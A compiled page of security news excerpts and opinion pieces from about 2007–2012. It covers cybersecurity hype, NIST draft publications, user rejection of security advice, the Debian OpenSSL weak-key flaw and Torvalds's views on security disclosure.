Washington teems with people who have a vested interest in conflating and inflating threats to our digital security. The watchword, therefore, should be “trust but verify.” In his famous farewell address to the nation in 1961, President Dwight Eisenhower warned against the dangers of what he called the “military-industrial complex”: an excessively close nexus between the Pentagon, defense contractors, and elected officials that could lead to unnecessary expansion of the armed forces, superfluous military spending, and a breakdown of checks and balances within the policy making process. Eisenhower’s speech proved prescient.

Cybersecurity is a big and booming industry. The U.S. government is expected to spend $10.5 billion a year on information security by 2015, and analysts have estimated the worldwide market to be as much as $140 billion a year. The Defense Department has said it is seeking more than $3.2 billion in cybersecurity funding for 2012. Lockheed Martin, Boeing, L-3 Communications, SAIC, and BAE Systems have all launched cybersecurity divisions in recent years. Other traditional defense contractors, such as Northrop Grumman, Raytheon, and ManTech International, have invested in information security products and services. We should be wary of proving Eisenhower right again in the cyber sphere.

Before enacting sweeping changes to counter cyber threats, policy makers should clear the air with some simple steps.

Stop the apocalyptic rhetoric. The alarmist scenarios dominating policy discourse may be good for the cybersecurity-industrial complex, but they aren’t doing real security any favors.

Declassify evidence relating to cyber threats. Overclassification is a widely acknowledged problem, and declassification would allow the public to verify the threats rather than blindly trusting self-interested officials.

Disentangle the disparate dangers that have been lumped together under the “cybersecurity” label. This must be done to determine who is best suited to address which threats. In cases of cybercrime and cyberespionage, for instance, private network owners may be best suited and have the best incentives to protect their own valuable data, information, and reputations.

UPDATE 2.14.12: Story was updated to correct the name of the worm that was supposed to have affected the Northeast power grid.

draft_sp800-128-ipd.pdf (850 KB) DRAFT Guide for Security Configuration Management of Information Systems

March 2010 | NIST

NIST announces the publication of Initial Public Draft Special Publication 800-128, Guide for Security Configuration Management of Information Systems. The publication provides guidelines for managing the configuration of information system architectures and associated components for secure processing, storing, and transmitting of information. Security configuration management is an important function for establishing and maintaining secure information system configurations, and provides important support for managing organizational risks in information systems.

NIST SP 800-128 identifies the major phases of security configuration management and describes the process of applying security configuration management practices for information systems including: (i) planning security configuration management activities for the organization; (ii) planning security configuration management activities for the information system; (iii) configuring the information system to a secure state; (iv) maintaining the configuration of the information system in a secure state; and (iv) monitoring the configuration of the information system to ensure that the configuration is not inadvertently altered from its approved state.

The security configuration management concepts and principles described in this publication provide supporting information for NIST SP 800-53, Revision 3, Recommended Security Controls for Federal Information Systems and Organizations that include the Configuration Management family of security controls and other security controls that draw upon configuration management activities in implementing those controls. This publication also provides important supporting information for the Monitor Step (Step 6) of the Risk Management Framework that is discussed in NIST SP 800-37, Revision 1, Guide for Applying the Risk Management Framework to Federal Information Systems: A Security Life Cycle Approach.

NIST requests comments on the Initial Public Draft of Special Publication 800-128, by June 14, 2010. Please submit comments to sec-cert@nist.gov.

[May 08, 2010] Are users right in rejecting security advice

TechRepublic.com

I now understand why my friend insisted I listen to Episode 229 of the Security Now series. He wanted to introduce me to Cormac Herley, Principle Researcher at Microsoft and his paper, “So Long, and No Thanks for the Externalities: The Rational Rejection of Security Advice by Users.”

Dr. Herley introduced the paper this past September at the New Security Paradigms Workshop, a fitting venue. See if you agree after reading the group’s mandate:

“NSPW’s focus is on work that challenges the dominant approaches and perspectives in computer security. In the past, such challenges have taken the form of critiques of existing practice as well as novel, sometimes controversial, and often immature approaches to defending computer systems.

By providing a forum for important security research that isn’t suitable for mainstream security venues, NSPW aims to foster paradigm shifts in information security.”

Herley’s paper is of special interest to the group. Not only does it meet one of NSPW’s tenets of being outside the mainstream. It forces a rethink of what’s important when it comes to computer security.

Radical thinking

To get an idea of what the paper is about, here’s a quote from the introduction:

“We argue that users’ rejection of the security advice they receive is entirely rational from an economic perspective. The advice offers to shield them from the direct costs of attacks, but burdens them with far greater indirect costs in the form of effort. Looking at various examples of security advice we find that the advice is complex and growing, but the benefit is largely speculative or moot.”

The above diagram (courtesy of Cormac Herley) shows what he considers as direct and indirect costs. So, is Herley saying that heeding advice about computer security is not worth it? Let’s find out.

Who’s right

Researchers have different ideas as to why people fail to use security measures. Some feel that regardless of what happens, users will only do the minimum required. Others believe security tasks are rejected because users consider them to be a pain. A third group maintains user education is not working.

Herley offers a different viewpoint. He contends that user rejection of security advice is based entirely on the economics of the process. He offers the following as reasons why:

To explain

As I read the paper, I sensed Herley was coaxing me to stop thinking like an IT professional and start thinking like a mainstream user. That way, I would understand the following:

Cost versus benefit

I wasn’t making the connection between cost-benefit trade-offs and IT security. My son, an astute business-type, had to explain that costs and benefits do not always directly refer to financial gains or losses. After hearing that, things started making sense. One such cost analysis was described by Steve Gibson in the podcast.

Gibson simply asked, how often do you require passwords to be changed? I asked several system administrators what time frame they used, most responded once a month. Using Herley’s logic, that means an attacker potentially has a whole month to use the password.

So, is the cost of having users struggle with new password every month beneficial? Before you answer, you may also want to think about bad practices users implement because of the frequent-change policy:

Is anything truly gained by having passwords changed often? The only benefit I see is if the attacker does not use the password within the password-refresh time limit. What’s your opinion? Is changing passwords monthly, a benefit or a cost?

Dr. Herley does an in-depth cost-benefit analysis in three specific areas, password rules, phishing URLs, and SSL certificate errors. I would like to spend some time with each.

Password rules

Password rules place the entire burden on the user. So, they understand the cost from having to abide by the following rules:

The report proceeds to explain how each rule is not really helpful. For example, the first three rules are not important, as most applications and Web sites have a lock out rule that restricts access after so many tries. I already touched on why “Change it often” is not considered helpful.

All said and done, users know that strictly observing the above rules is no guarantee of being safe from exploits. That makes it difficult for them to justify the additional effort and associated cost.

Phishing URLs

Trying to explain URL spoofing to users is complicated. Besides, by the time you get through half of all possible iterations, most users are not listening. For example, the following slide (courtesy of Cormac Herley) lists some spoofed URLs for PayPal:

To reduce cost to users, Herley wants to turn this around. He explains that users need to know when the URL is good, not bad:

“The main difficulty in teaching users to read URLs is that in certain cases this allows users to know when something is bad, but it never gives a guarantee that something is good. Thus the advice cannot be exhaustive and is full of exceptions.”

Certificate errors

For the most part, people understand SSL, the significance of https, and are willing to put up with the additional burden to keep their personal and financial information safe. Certificate errors are a different matter. Users do not understand their significance and for the most part ignore them.

I’m as guilty as the next when it comes to certificate warnings. I feel like I’m taking a chance, yet what other options are available? After reading the report, I am not as concerned. Why, statistics show that virtually all certificate errors are false positives.

The report also reflects the irony of thinking that ignored certificate warnings will lead to problems. Typically, bad guys do not use SSL on their phishing sites and if they do, they are going to make sure their certificates work, not wanting to bring any undue attention to their exploit. Herley states it this way:

“Even if 100% of certificate errors are false positives it does not mean that we can dispense with certificates. However, it does mean that for users the idea that certificate errors are a useful tool in protecting them from harm is entirely abstract and not evidence-based. The effort we ask of them is real, while the harm we warn them of is theoretical.”

Outside the box

There you have it. Is that radical-enough thinking for you? It is for me. That said, Dr. Herley offers the following advice:

“We do not wish to give the impression that all security advice is counter-productive. In fact, we believe our conclusions are encouraging rather than discouraging. We have argued that the cost-benefit trade off for most security advice is simply unfavorable: users are offered too little benefit for too much cost.

Better advice might produce a different outcome. This is better than the alternative hypothesis that users are irrational. This suggests that security advice that has compelling cost-benefit trade off has real chance of user adoption. However, the costs and benefits have to be those the user cares about, not those we think the user ought to care about. “

Herley offers the following advice to help us get out of this mess:

Final thoughts

The big picture idea I am taking away from Dr. Herley’s paper is that users have never been offered security. All the advice, policies, directives, and what not offered in the name of IT security only promotes reduced risk. Could changing that be the paradigm shift needed to get information security on track?

I want to thank Dr. Cormac Herley for his thought-provoking paper and e-mail conversation

[Apr 21, 2009] SP 800-118 DRAFT Guide to Enterprise Password Management

Apr. 21, 2009 | NIST

NIST announces that Draft Special Publication (SP) 800-118, Guide to Enterprise Password Management, has been released for public comment. SP 800-118 is intended to help organizations understand and mitigate common threats against their character-based passwords. The guide focuses on topics such as defining password policy requirements and selecting centralized and local password management solutions.

NIST requests comments on draft SP 800-118 by May 29, 2009. Please submit comments to 800-118comments@nist.gov with "Comments SP 800-118" in the subject line.

draft-sp800-118.pdf (181 KB)

Threat of 'cyberwar' has been hugely hyped - CNN.com by Bruce Schneier.

Editor's note: Bruce Schneier is a security technologist and author of "Beyond Fear: Thinking Sensibly About Security in an Uncertain World." Read more of his writing at http://www.schneier.com/

(CNN) -- There's a power struggle going on in the U.S. government right now.

It's about who is in charge of cyber security, and how much control the government will exert over civilian networks. And by beating the drums of war, the military is coming out on top.

"The United States is fighting a cyberwar today, and we are losing," said former NSA director -- and current cyberwar contractor -- Mike McConnell. "Cyber 9/11 has happened over the last ten years, but it happened slowly so we don't see it," said former National Cyber Security Division director Amit Yoran. Richard Clarke, whom Yoran replaced, wrote an entire book hyping the threat of cyberwar.

General Keith Alexander, the current commander of the U.S. Cyber Command, hypes it every chance he gets. This isn't just rhetoric of a few over-eager government officials and headline writers; the entire national debate on cyberwar is plagued with exaggerations and hyperbole.

Googling those names and terms -- as well as "cyber Pearl Harbor," "cyber Katrina," and even "cyber Armageddon" -- gives some idea how pervasive these memes are. Prefix "cyber" to something scary, and you end up with something really scary.

Cyberspace has all sorts of threats, day in and day out. Cybercrime is by far the largest: fraud, through identity theft and other means, extortion, and so on. Cyber-espionage is another, both government- and corporate-sponsored. Traditional hacking, without a profit motive, is still a threat. So is cyber-activism: people, most often kids, playing politics by attacking government and corporate websites and networks.

These threats cover a wide variety of perpetrators, motivations, tactics, and goals. You can see this variety in what the media has mislabeled as "cyberwar." The attacks against Estonian websites in 2007 were simple hacking attacks by ethnic Russians angry at anti-Russian policies; these were denial-of-service attacks, a normal risk in cyberspace and hardly unprecedented.

A real-world comparison might be if an army invaded a country, then all got in line in front of people at the DMV so they couldn't renew their licenses. If that's what war looks like in the 21st century, we have little to fear.

Similar attacks against Georgia, which accompanied an actual Russian invasion, were also probably the responsibility of citizen activists or organized crime. A series of power blackouts in Brazil was caused by criminal extortionists -- or was it sooty insulators? China is engaging in espionage, not war, in cyberspace. And so on.

One problem is that there's no clear definition of "cyberwar." What does it look like? How does it start? When is it over? Even cybersecurity experts don't know the answers to these questions, and it's dangerous to broadly apply the term "war" unless we know a war is going on.

Yet recent news articles have claimed that China declared cyberwar on Google, that Germany attacked China, and that a group of young hackers declared cyberwar on Australia. (Yes, cyberwar is so easy that even kids can do it.) Clearly we're not talking about real war here, but a rhetorical war: like the war on terror.

We have a variety of institutions that can defend us when attacked: the police, the military, the Department of Homeland Security, various commercial products and services, and our own personal or corporate lawyers. The legal framework for any particular attack depends on two things: the attacker and the motive. Those are precisely the two things you don't know when you're being attacked on the Internet. We saw this on July 4 last year, when U.S. and South Korean websites were attacked by unknown perpetrators from North Korea -- or perhaps England. Or was it Florida?

We surely need to improve our cybersecurity. But words have meaning, and metaphors matter. There's a power struggle going on for control of our nation's cybersecurity strategy, and the NSA and DoD are winning. If we frame the debate in terms of war, if we accept the military's expansive cyberspace definition of "war," we feed our fears.

We reinforce the notion that we're helpless -- what person or organization can defend itself in a war? -- and others need to protect us. We invite the military to take over security, and to ignore the limits on power that often get jettisoned during wartime.

If, on the other hand, we use the more measured language of cybercrime, we change the debate. Crime fighting requires both resolve and resources, but it's done within the context of normal life. We willingly give our police extraordinary powers of investigation and arrest, but we temper these powers with a judicial system and legal protections for citizens.

We need to be prepared for war, and a Cyber Command is just as vital as an Army or a Strategic Air Command. And because kid hackers and cyber-warriors use the same tactics, the defenses we build against crime and espionage will also protect us from more concerted attacks. But we're not fighting a cyberwar now, and the risks of a cyberwar are no greater than the risks of a ground invasion. We need peacetime cyber-security, administered within the myriad structure of public and private security institutions we already have.

The opinions expressed in this commentary are solely those of Bruce Schneier.

[Apr 14, 2009] Security Software Protection or Extortion by Rick Broida and Robert Vamosi,

April 13, 2009 | PC World

As the Conficker worm sprang to life on April 1, talk here at the PC World offices turned to some interesting debates about how best to protect PCs from malware threats. In recent weeks we've run several helpful articles offering tips, tricks, and insights to keep you and your PC safe from Conficker and other malware on the Internet. At the same time, a few among us have revealed that they don't run any security software at all on their own machines--and have no intention of starting now.

Shocking as it may sound, there are plenty of experienced, knowledgeable technophiles out there who laugh in the face of danger as they traipse unprotected through the wilds of the online world. Among them is our own Hassle-Free PC blogger Rick Broida, who prefers what he deems the relatively minor threat of malware to the annoyance of intrusive, nagging security apps.

Is he insane? Naïve? To find out, we gave Rick a podium to speak on behalf of those who shrug off the safety of antimalware suites, and to defend his point of view in a debate with security correspondent Robert Vamosi, who regularly reports on malware and other security threats for PC World's Business Center. Who's right? Who's nuts? You be the judge. Share your view in our comments section.

First up, Rick Broida presents his assertion that security suites are an unnecessary nuisance compared with the threat of malware.

Rick Broida: We Don't Need No Stinking Security Software

Security software is a scam. A rip-off. A waste of money, a pain in the neck, and a surefire way to bring even the speediest PC to a crawl. Half the time it seems to cause more problems than it solves. Oh, and one more thing: It's unnecessary.

Heresy? Crazy talk? Recipe for disaster? No, no, and no. For the past several years, I've run Windows (first XP, and now Vista) without a single byte of third-party security software. No ZoneAlarm. No Norton Internet Security. No Spyware Doctor. Not even freebie favorite Avast Home Edition. I use nothing but the tools built into Windows and a few tricks I've learned.

Want to know how much time I've spent cleaning up after viruses, spyware, rootkits, Trojan horses, keyloggers, and other security breaches? None. I'll say that again: none.

Maybe I'm asking for trouble (that sound you hear is fellow PC World columnist Rob Vamosi nodding furiously), but after years of infection-free computing, I have no qualms about my methods. Your mileage may vary, and I make no guarantees. But if you want to rid your system of pricey, performance-choking security software, read on.

My first line of defense is my router. Like most, it has a built-in firewall that blocks all unauthorized traffic and makes my network more or less invisible to the outside world. The second line of defense is Windows. XP, Vista, and 7 have built-in firewalls that help protect against "inside" attacks, such as if a friend were to come over with his spyware-infected laptop and connect to my network.

Of course, a router can't stop viruses, phishing, and other threats that arrive via e-mail. My secret weapon: Gmail. As I noted in "Use Gmail to Fight Spam," I route mail from my personal domain to my Gmail account. (From there, I can access messages on the Web or pull them down via Outlook.) Gmail does a phenomenal job filtering spam--much of which is malware. The service also performs a virus scan on all attachments.

By using Gmail as an intermediary between my POP3 server and my PC, I've kept not only spam at bay, but malware as well. I don't know whether Windows Live Mail and Yahoo Mail offer similar amenities, but for me Gmail is a slam-dunk solution. Even phishing messages are few and far between. Of course, as an educated user, I know better than to click a link in a message filled with scary come-ons ("Your account has been compromised!").

Speaking of phishing, the latest versions of Firefox and Internet Explorer offer robust antiphishing tools. Both will sound the alarm if I attempt to visit sites known to be fraudulent, meaning that even if I click something that looks like, say, a totally legit PayPal or eBay link, I'll get fair warning. And that's just the tip of the safe-browser iceberg: Firefox and IE are way more secure than in the old days. They block pop-ups, provide Web site ID checks, protect against malware installation, and so on.

As for other threats, I'm comfortable leaving my PC in the capable hands of Windows Defender. Microsoft's antispyware tool runs quietly and efficiently in the background. I "check in" once in a while to make sure it's active and up-to-date, but otherwise I never hear a peep from it.

Of course, that could mean bad stuff is slipping past Defender, right? Sure, it's possible. That's why I occasionally run a system scan using Ad-Aware or Malwarebytes Anti-Malware. (I'm not completely insane, after all.) So far, so good: The scans always come up empty.

Last but not least, I exercise common sense. I don't open e-mail attachments from people I don't know. I don't download files from disreputable or unknown sources. I don't visit Web sites that peddle gambling, porn, torrents, or "warez." (Yeah, I know, I'm boring.) In other words, I keep my Internet nose clean, which in turn keeps my PC clean.

At the same time, I make sure that automatic updates are turned on for Windows, my Web browsers, and any other software that gets patched regularly. And, perhaps most important of all, I rely on multiple backup methods just in case my system really is compromised somehow. For example, my Firefox bookmarks are all synced to the Web via Xmarks (formerly Foxmarks). I use the online-backup service Mozy to archive my critical documents and Outlook PST file. And drive-cloning utility Casper makes a weekly copy of my entire hard drive to a second drive.

Ladies and gentlemen of the security-software jury, I rest my case. My only real evidence is Exhibit A: me. After several years with XP and about six months with Vista, I'm still cruising along without a security care in the world. So, are you going to lock me up or accept me as your new messiah? Either way, I'm good.

Next up, security correspondent Robert Vamosi argues the opposing view.

[Feb 27, 2009] NIST Computer Security Division released 2 draft publications

(Special Publication & NIST Interagency Report) today and 1 Mark-up

Copy of Draft SP --

1. Mark-up copy of Draft Special Publication (SP) 800-53 Revision 3

2. Draft Special Publication 800-81 Revision 1

3. Draft NIST Interagency Report (IR) 7517

1. Draft SP 800-53 Rev. 3: Recommended Security Controls for Federal Information Systems and Organizations

The following document provides a line-by-line (mark-up copy) comparison between SP 800-53, Revision 2 and Draft SP 800-53, Revision 3. It should also be noted that the section of the publication addressing scoping considerations for scalability, was inadvertently omitted from the public draft and will be reinstated in the final publication.

URL: http://csrc.nist.gov/publications/PubsDrafts.html#800-53_Rev3

******

2. Draft SP 800-81 Rev. 1: Secure Domain Name System (DNS) Deployment Guide

NIST has drafted a new version of the document "Secure Domain Name System (DNS) Deployment Guide (SP 800-81)". This document, after a review and comment cycle will be published as NIST SP 800-81r1. There will be two rounds of public comments and this is our posting for the first one. Federal agencies and private organizations as well as individuals are invited to review the draft Guidelines and submit comments to NIST by sending them to SecureDNS@nist.gov before March 31, 2009. Comments will be reviewed and posted on the CSRC website.

All comments will be analyzed, consolidated, and used in revising the draft Guidelines before final publication.

Reviewers of the draft revised Guidelines should note the following differences and additions:

(1) Updated Recommendations for all cryptographic operations relating to digital signing of DNS records, verification of the signatures, Zone Transfer, Dynamic Updates, key Management and Authenticated Denial of Existence.

(2) The additional IETF RFC documents that have formed the basis for the updated recommendations include: DNNSEC Operational Practices

(RFC 4641), Automated Updates for DNS Security (DNSSEC) Trust Anchors

(RFC 5011), DNS Security (DNSSEC) Hashed Authenticated Denial of

Existence (RFC 5155) and HMAC SHA TSIG Algorithm Identifiers (RFC 4635).

(3) The FIPS standards and NIST guidelines incorporated into the updated recommendations include: The Keyed-Hash Message Authentication Code (HMAC) (FIPS 198-1), Digital Signature Standard (FIPS 186-3) and Recommendations for Key Management (SP 800-57P1 & SP 800-57P3).

(4) Illustration of Secure configuration examples using DNS

Software offering NSD, in addition to BIND.

URL: http://csrc.nist.gov/publications/PubsDrafts.html#800-81-rev1

[Feb 17, 2009] SP 800-53, Revision 3 DRAFT Recommended Security Controls for Federal Information Systems and Organizations

NIST announces the release of the Initial Public Draft (IPD) of Special Publication 800-53, Revision 3, Recommended Security Controls for Federal Information Systems and Organizations. This is the first major update of Special Publication 800-53 since its initial publication in December 2005. We have received excellent feedback from our customers during the past three years and have taken this opportunity to provide significant improvements to the security control catalog. In addition, the changing threat environment and growing sophistication of cyber attacks necessitated specific changes to the allocation of security controls and control enhancements in the low-impact, moderate-impact, and high-impact baselines. We also continue to work closely with the Department of Defense and the Office of the Director of National Intelligence under the auspices of the Committee on National Security Systems on the harmonization of security control specifications across the federal government. And lastly, we have added new security controls to address organization-wide security programs and introduced the concept of a security program plan to capture security program management requirements for organizations. The privacy-related material, originally scheduled to be included in Special Publication 800-53, Revision 3, will undergo a separate public review process in the near future and be incorporated into this publication, when completed. Comments will be accepted until March 27, 2009. Comments should be forwarded via email to sec-cert@nist.gov.

Draft-SP800-53 Rev.3.pdf (2,112 KB)

Cisco study IT security policies unfair - Network World by By Jim Duffy ,

A better term for "unfair security policy" would be a "bureaucratic perversion". The level of detachment from reality is really crucial and can vary from "no clue" to "parallel universe". But the key element is "not do any harm". That's why extremely unfair security policies are often called administrative fascism.

Unfair policies prompt most employees to break company IT security rules, and that could lead to lost customer data, a Cisco study found.

Cisco this week released a second set of findings from a global study on data leakage. The first part dealt with common employee data leakage risks and the potential impact on the collaborative workforce.

Part two deals with the ‘whys’ of behavior that raises the risk of corporate data leakage. More than half of the employees surveyed admitted that they do not always adhere to corporate security polices.

And when they don’t, it can lead to leakage of sensitive data. Of the IT respondents who dealt with employee policy violations, one in five reported that incidents resulted in lost customer data, according to the Cisco study.

The surveys were conducted of more than 2,000 employees and IT professionals in 10 countries: the United States, the United Kingdom, France, Germany, Italy, Japan, China, India, Australia and Brazil. They were executed by InsightExpress, a U.S.-based market research firm, and commissioned by Cisco.

The study found that the majority of employees believe their companies’ IT security policies are unfair. Indeed, surveyed employees said the top reason for non-compliance is the belief that policies do not align with the reality of what they need to do their jobs, according to Cisco.

The study found that the majority of employees in eight of 10 countries felt their company’s policies were unfair. Only employees in Germany and the United States did not agree.

In Germany, even though the majority of employees felt their companies’ policies were fair, more than half of them said they would break rules to complete their jobs, the study found. Of all the countries, France (84%) has the most employees who admitted defying policies, whether rarely or routinely.

In India, one in 10 employees admitted never or hardly ever abiding by corporate security policies. Overall, the study found that 77% of companies had security policies in place.

But defiance may not be intentional. IT and employees have a disconnect when it comes to policy and adherence awareness, the study found.

IT believes employees defy policies for a variety of reasons, from failing to grasp the magnitude of security risks to apathy; employees say they break them because they do not align with the ability to do their jobs.

But IT could do a better job communicating those policies. The study found that, depending on the country, the number of IT professionals who knew a policy existed was 20% to 30% higher than the number of employees.

Torvalds: Fed up with the security circus By Ellen Messmer

"A lot of activity [in various security camps] stems from public-relations posturing." "What does the whole security labeling give you? Except for more fodder for either of the PR camps that I obviously think are both idiots pushing for their own agenda?" Torvalds says. "It just perpetrates that whole false mind-set" and is a waste of resources, he says.

Creator of the Linux kernel explains why he finds security people to be so anathema 08/14/2008 , Network World Linus Torvalds, creator of the Linux kernel, says he's fed up with what he sees as a "security circus" surrounding software vulnerabilities and how they're hyped by security people.

Torvalds explained his position in an e-mail exchange with Network World this week. He also expanded on critical comments he made last month that caused a stir in the IT industry.

Last month Torvalds stated in an online posting that "one reason I refuse to bother with the whole security circus is that I think it glorifies -- and thus encourages -- the wrong behavior. It makes 'heroes' out of security people, as if the people who don't just fix normal bugs aren't as important. In fact, all the boring normal bugs are way more important, just because there's a lot more of them."

Never one to mince words, Torvalds also lobbed a verbal charge at the OpenBSD community: "I think the OpenBSD crowd is a bunch of masturbating monkeys, in that they make such a big deal about concentrating on security to the point where they pretty much admit that nothing else matters to them."

This week Torvalds -- who says the only person involved in the OpenBSD community with whom he talked to about the "monkeys" barb found it funny -- acknowledges others probably found it offensive.

Via e-mail, he also explains why he finds security people to be so anathema.

Too often, so-called "security" is split into two camps: one that believes in nondisclosure of problems by hiding knowledge until a bug is fixed, and one that "revels in exposing vendor security holes because they see that as just another proof that the vendors are corrupt and crap, which admittedly mostly are," Torvalds states.

Torvalds went on to say he views both camps as "crazy."

"Both camps are whoring themselves out for their own reasons, and both camps point fingers at each other as a way to cement their own reason for existence," Torvalds asserts. He says a lot of activity in both camps stems from public-relations posturing.

He says neither camp is absolutely right in any event, and that a middle course, based on fixing things as early as possible without a lot of hype, is preferable.

"You need to fix things early, and that requires a certain level of disclosure for the developers," Torvalds states, adding, "You also don't need to make a big production out of it."

Torvalds also says he doesn't care for labeling updates and changes to Linux as a security fix in a security advisory.

"What does the whole security labeling give you? Except for more fodder for either of the PR camps that I obviously think are both idiots pushing for their own agenda?" Torvalds says. "It just perpetrates that whole false mind-set" and is a waste of resources, he says.

It's better to avoid sticking solely to either "full and immediate disclosure" or ignoring bugs that might embarrass vendors, he points out. "Any situation that allows the vendor to sit on the bug for weeks or months is unacceptable, as is any situation that makes it harder for people who find problems to talk to technical people."

Torvalds says he's skeptical about the value of synchronized releases among vendors that favor the idea of an embargo of software vulnerability information until a fix from a vendor is ready.

That process discourages thinking about design changes to make it harder to have security bugs, Torvalds says. "So, the whole 'embargoes are good' mentality is just corruption from the vendors," he states. "But on the other hand, disclosure should not be the goal."

"I don’t believe in either camp," Torvalds concludes. What he does favor is to "have a model where security is easier to do in the first place -- that is, the Unix model -- but make it easy for people to report bugs with no embargo, but privately."

He says the Linux kernel security list "is private" in the sense that "we don't need to leak things out further" to get some software issue fixed. He says the process allows, though doesn't encourage, a five-day embargo, and "even then, I will forward it to technical people on an 'as needed' basis, because even that embargo secrecy is not some insane absolute thing."

Comments

Some people ...By Anonymous on August 17, 2008, 2:31 pm

I can't believe the genius behind Linux referred to proactively fixing all bugs, regardless of security implications as "masturbating", since that's quite obviously...

[May 16, 2008] Linux gets security black eye

May 16, 2008

As has been widely reported, the maintainers of Debian's OpenSSL packages made some errors recently that have potentially compromised the security of any sshd-equipped system used remotely by Debian users. System administrators may wish to purge authorized_key files of public keys generated since 2006 by affected client machines.

Simply using a Debian-based machine to access a remote server via SSH would not be enough to put the machine at risk. However, if the user copied a public key generated on a Debian-based system to the remote server, for example to take advantage of the higher security offered by password-free logins, then the weak key could make the server susceptible to brute-force attacks, especially if the user's name is easily guessable.

Administrators of servers that run SSH may wish to go through users' authorized key files (typically ~/.ssh/authorized_keys), deleting any that may have been affected. A "detector" script, available here, appears to compare public key signatures against a list of just 262,800 entries. That in turn suggests that if the user's name is known, a brute force attack progressing at one guess per second could succeed within 73 hours (262,800 seconds).

A full explanation of the problem can be found here. In a nutshell, Debian's OpenSSL maintainers made some Debian-specific patches that, according to subscriber-only content at LWN.net, were aimed at fixing a memory mapping error that surfaced during testing with the valgrind utility. The unintended consequence was a crippling of the randomness of keys, making them predictable, and thus possible to guess using "brute-force" attacks. And unfortunately, the Debian maintainers failed to submit their patches upstream, and thus the problem did not surface until very recently (there's certainly a lesson to be learned, there). Not surprisingly, brute force attacks are way up this week, LWN.net also reported.

Users of Debian and Debian-based distributions such as Ubuntu should immediately upgrade the SSH software on their systems. The new ssh-client package will contain an "ssh-vulnkey" utility that, when run, checks the user's keys for the problem. Users should re-generate any affected keys as soon as possible.

Also possibly affected are "OpenVPN keys, DNSSEC keys, and key material for use in X.509 certificates and session keys used in SSL/TLS connections," though not apparently Keys generated with GnuPG or GNUTLS. More details can be found here (Debian resource page), as well as on this webpage, which also links to lists of common keys and brute-force scripts that boast of 20-minute typical break-in times.

-- Henry Kingman

[May 16, 2008] Practical Technology » Open-Source Security Idiots

The key mechanism is really alarming.
Sometimes, people do such stupid things that words almost fail me. That’s the case with a Debian ‘improvement’ to OpenSSL that rendered this network security program next to useless in Debian, Ubuntu and other related Linux distributions.

OpenSSL is used to enable SSL (Secure Socket Layer) and TLS (Transport Layer Security) in Linux, Unix, Windows and many other operating systems. It also includes a general purpose cryptography library. OpenSSL is used not only in operating systems, but in numerous vital applications such as security for Apache Web servers, OpenVPN for virtual private networks, and in security appliances from companies like Check Point and Cisco.

Get the picture? OpenSSL isn’t just important, it’s vital, in network security. It’s quite possible that you’re running OpenSSL even if you don’t have a single Linux server within a mile of your company. It’s that widely used.

Now, OpenSSL itself is still fine. What’s anything but fine is any Linux, or Linux-powered device, that’s based on Debian Linux OpenSSL code from September 17th, 2006 until May 13, 2008.

What happened? This is where the idiot part comes in. Some so-called Debian developer decided to ‘fix’ OpenSSL because it was causing the Valgrind code analysis tool and IBM’s Rational Purify runtime debugging tool to produce warnings about uninitialized data in any code that was linked to OpenSSL. This ‘problem’ and its fix have been known for years. That didn’t stop our moronic developer from fixing it on his own by removing the code that enabled OpenSSL to generate truly random numbers..

After this ‘fix,’ OpenSSL on Debian systems could only use one of a range from 1 to 32,768—the number of possible Linux process identification numbers—as the ‘random’ number for its PRNG (Pseudo Random Number Generator). For cryptography purposes, a range of number like that is a bad joke. Anyone who knows anything about cracking can work up a routine to automatically bust it within a few hours.

Why didn’t the OpenSSL team catch this problem? They didn’t spot it because they didn’t see it. You see Debian developers have this cute habit of keeping their changes to themselves rather than passing them upstream to any program’s actual maintainers. Essentially, what Debian ends up doing is forking programs. There’s the Debian version and then there’s the real version.

Usually, it’s a difference that makes no difference. Sometimes, it just shows how pig-headed Debian developers can be. My favorite case of this is when they decided that rather than allow Mozilla to have control of the logo in the Firefox browser, because that wasn’t open enough according to the Debian Social Contract, they forked Firefox into their own version: Iceweasel.

That was just stupid. This is stupid and it’s put untold numbers of users at risk for security attacks.

First, the mistake itself was something that only a programming newbie would have made and I have no idea how this ever got passed by the Debian code maintainers. This is first-year programming assignment. “What is a random number generator and how do you make one?”

Then, insult to injury, because Debian never passed its ‘fix’ on to OpenSSL, the people who would have caught the problem at a glance, this sloppy, insecure mess has now been used on hundreds of thousands, if not millions, of servers, PCs, and appliances.

This isn’t just bad. This is Microsoft security bad.

Now, there’s a fix for Debian 4.0 Etch and its development builds. Ubuntu, which is based on Debian,, also have fixes for it. In Ubuntu, the versions that need patches are Ubuntu 7.04, Feisty; Ubuntu 7.10, Gutsy; the just released Ubuntu 8.04 LTS Hardy, and the developer builds of Ubuntu Intrepid Ibex.

Debian has also opened a site on how to rollover your insecure security keys to the better ones once you’ve installed the corrected software.. For more on how to fix your system, see Fixing Debian OpenSSL on my ComputerWorld blog, Cyber Cynic.

[May 14, 2008] Securing the net-the fruits of incompetence

[May 8, 2008] National Checklist Program Repository

30814 CVE Vulnerabilities
160 Checklists
141 US-CERT Alerts
2192 US-CERT Vuln Notes
3259 OVAL Queries

[May 8, 2008] CWE - Common Weakness Enumeration

[May 8, 2008] http://csrc.nist.gov/publications/PubsDrafts.html#800-123

Reasonably well-written draft. Good strcture. Uneven coverage of topics (weak for "6.4.1. vulnerability scanning (question of false positives is swiped under the carpet. Good list of additional documents on page D2.

Draft SP 800-123, Guide to General Server Security, is available for public comment.

This document is intended to assist organizations in installing, configuring, and maintaining secure servers. SP 800-123 makes recommendations for securing a server's operating system and server software, as well as maintaining the server's secure configuration through application of appropriate patches and upgrades, security testing, log monitoring, and backups of data and operating system files.

The document addresses common servers that use general operating systems and are deployed in both outward-facing and inward-facing locations.

Comments need to be received by June 13, 2008.

[Apr 23, 2008] Semantic Gap

Posted by kdawson on Wednesday April 23, @08:03AM
from the stand-and-identify dept. captcha_fun writes

"Researchers at Penn State have developed a patent-pending image-based CAPTCHA technology for next-generation computer authentication. A user is asked to pass two tests: (1) click the geometric center of an image within a composite image, and (2) annotate an image using a word selected from a list. These images shown to the users have fake colors, textures, and edges, based on a sequence of randomly-generated parameters. Computer vision and recognition algorithms, such as alipr, rely on original colors, textures, and shapes in order to interpret the semantic content of an image. Because of the endowed power of imagination, even without the correct color, texture, and shape information, humans can still pass the tests with ease. Until computers can 'imagine' what is missing from an image, robotic programs will be unable to pass these tests. The system is called IMAGINATION and you can try it out."

This sounds promising given how broken current CAPTCHA technology is.

[Dec 28, 2007] http://csrc.nist.gov/publications/PubsSPs.html#800-53_Rev2

December 28, 2007 | NIST

